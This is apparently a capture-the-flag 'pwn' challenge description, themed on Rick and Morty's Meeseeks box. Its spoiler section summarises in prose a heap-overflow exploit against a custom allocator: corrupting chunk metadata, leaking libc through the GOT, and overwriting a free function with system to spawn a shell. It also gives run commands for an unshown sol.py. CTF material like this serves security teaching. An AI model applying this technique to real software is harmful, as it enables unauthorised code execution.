Category: pwn
Author: condiom
Rick: This is a Meeseeks box. Let me show you how it works. You press this.
(meeseeks spawns)
Meeseeks: I'm Mr. Meeseeks! Look at me!
Rick: You make a request. Mr. Meeseeks, open Jerry's stupid mayonnaise jar.
Meeseeks: Yes, siree!
(Meeseeks grabs mayonnaise jar as Rick explains.)
Rick: The Meeseeks fulfills the request.
(Meeseeks opens jar and hands to jerry.)
Meeseeks: All done!
Jerry: [amazed] Wow!
Rick: And then it stops existing.
(Meeseeks vanishes into particles in air.)
Reveal Spoiler
A custom implementation of a heap memory management library has been created.
There is a buffer overflow vulnerability when creating Mr. Meeseeks that allows you to override the metadata of the next chunk of memory.
Goal is to trick the custom library into giving you a chunk that point to the GOT and leak a memory adress libc without breaking the execution flow.
Then overide the the custom library myfree GOT with the system function and call it with the "bin/sh" string to get a shell
A solution that performs the above steps is provided in sol.py. Use the following:
Run against local docker container
python3.7 sol.py R LHOST
Run against CyberRanges (IP might change in sol.py)
python3.7 sol.py R